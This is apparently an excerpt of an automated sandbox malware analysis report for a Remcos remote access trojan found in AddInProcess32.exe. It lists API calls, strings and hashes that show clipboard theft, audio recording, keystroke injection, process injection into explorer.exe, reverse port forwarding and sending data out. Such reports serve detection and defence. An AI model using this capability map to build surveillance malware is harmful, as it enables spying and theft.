                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                            • String ID: 0VG$0VG$<$@$Temp
                                            • API String ID: 1704390241-2575729100
                                            • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                            • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                            • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                            • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                            APIs
                                            • OpenClipboard.USER32 ref: 0041697C
                                            • EmptyClipboard.USER32 ref: 0041698A
                                            • CloseClipboard.USER32 ref: 00416990
                                            • OpenClipboard.USER32 ref: 00416997
                                            • GetClipboardData.USER32(0000000D), ref: 004169A7
                                            • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                            • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                            • CloseClipboard.USER32 ref: 004169BF
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                            • String ID: !D@
                                            • API String ID: 2172192267-604454484
                                            • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                            • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                            • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                            • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                            APIs
                                            • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                            • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                            • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                            • CloseHandle.KERNEL32(?), ref: 004134A0
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                            • String ID:
                                            • API String ID: 297527592-0
                                            • Opcode ID: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                            • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                            • Opcode Fuzzy Hash: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                            • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ControlManager
                                            • String ID:
                                            • API String ID: 221034970-0
                                            • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                            • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                            • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                            • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                            APIs
                                            • _free.LIBCMT ref: 004481B5
                                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                            • _free.LIBCMT ref: 004481C1
                                            • _free.LIBCMT ref: 004481CC
                                            • _free.LIBCMT ref: 004481D7
                                            • _free.LIBCMT ref: 004481E2
                                            • _free.LIBCMT ref: 004481ED
                                            • _free.LIBCMT ref: 004481F8
                                            • _free.LIBCMT ref: 00448203
                                            • _free.LIBCMT ref: 0044820E
                                            • _free.LIBCMT ref: 0044821C
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                            • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                            • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                            • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Eventinet_ntoa
                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                            • API String ID: 3578746661-3604713145
                                            • Opcode ID: 10eb1960a8d8ce6813e19caa070b236760d69188d96698ceea7a474dae621fae
                                            • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                            • Opcode Fuzzy Hash: 10eb1960a8d8ce6813e19caa070b236760d69188d96698ceea7a474dae621fae
                                            • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                            APIs
                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DecodePointer
                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                            • API String ID: 3527080286-3064271455
                                            • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                            • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                            • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                            • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                            APIs
                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                            • __fassign.LIBCMT ref: 0044B4F9
                                            • __fassign.LIBCMT ref: 0044B514
                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
                                            • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                            • String ID: PkGNG
                                            • API String ID: 1324828854-263838557
                                            • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                            • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                            • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                            • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                            APIs
                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                            • Sleep.KERNEL32(00000064), ref: 0041755C
                                            • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreateDeleteExecuteShellSleep
                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                            • API String ID: 1462127192-2001430897
                                            • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                            • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                            • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                            • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                            APIs
                                            • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                            • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 004074D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentProcess
                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                            • API String ID: 2050909247-4242073005
                                            • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                            • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                            • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                            • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                            APIs
                                            • _strftime.LIBCMT ref: 00401D50
                                              • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                            • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                            • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                            • API String ID: 3809562944-243156785
                                            • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                            • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                            • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                            • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                            • int.LIBCPMT ref: 00410EBC
                                              • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                              • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                            • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                            • __Init_thread_footer.LIBCMT ref: 00410F64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                            • String ID: ,kG$0kG
                                            • API String ID: 3815856325-2015055088
                                            • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                            • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                            • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                            • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                            APIs
                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                            • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                            • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                            • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                            • waveInStart.WINMM ref: 00401CFE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                            • String ID: dMG$|MG$PG
                                            • API String ID: 1356121797-532278878
                                            • Opcode ID: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                            • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                            • Opcode Fuzzy Hash: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                            • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                              • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                              • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                              • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                            • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                            • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                            • TranslateMessage.USER32(?), ref: 0041D57A
                                            • DispatchMessageA.USER32(?), ref: 0041D584
                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                            • String ID: Remcos
                                            • API String ID: 1970332568-165870891
                                            • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                            • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                            • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                            • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                            • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                            • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                            • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                            APIs
                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                            • __alloca_probe_16.LIBCMT ref: 00453F6A
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                            • __alloca_probe_16.LIBCMT ref: 00454014
                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                            • __freea.LIBCMT ref: 00454083
                                            • __freea.LIBCMT ref: 0045408F
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                            • String ID:
                                            • API String ID: 201697637-0
                                            • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                            • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                            • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                            • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                            APIs
                                              • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • _memcmp.LIBVCRUNTIME ref: 004454A4
                                            • _free.LIBCMT ref: 00445515
                                            • _free.LIBCMT ref: 0044552E
                                            • _free.LIBCMT ref: 00445560
                                            • _free.LIBCMT ref: 00445569
                                            • _free.LIBCMT ref: 00445575
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorLast$_abort_memcmp
                                            • String ID: C
                                            • API String ID: 1679612858-1037565863
                                            • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                            • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                            • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                            • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: tcp$udp
                                            • API String ID: 0-3725065008
                                            • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                            • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                            • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                            • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 004018BE
                                            • ExitThread.KERNEL32 ref: 004018F6
                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                            • String ID: PkG$XMG$NG$NG
                                            • API String ID: 1649129571-3151166067
                                            • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                            • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                            • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                            • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                            APIs
                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                            • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                              • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                              • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                            • String ID: .part
                                            • API String ID: 1303771098-3499674018
                                            • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                            • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                            • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                            • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                            APIs
                                            • SendInput.USER32 ref: 00419A25
                                            • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                            • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                              • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InputSend$Virtual
                                            • String ID:
                                            • API String ID: 1167301434-0
                                            • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                            • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                            • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                            • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                            APIs
                                            Strings
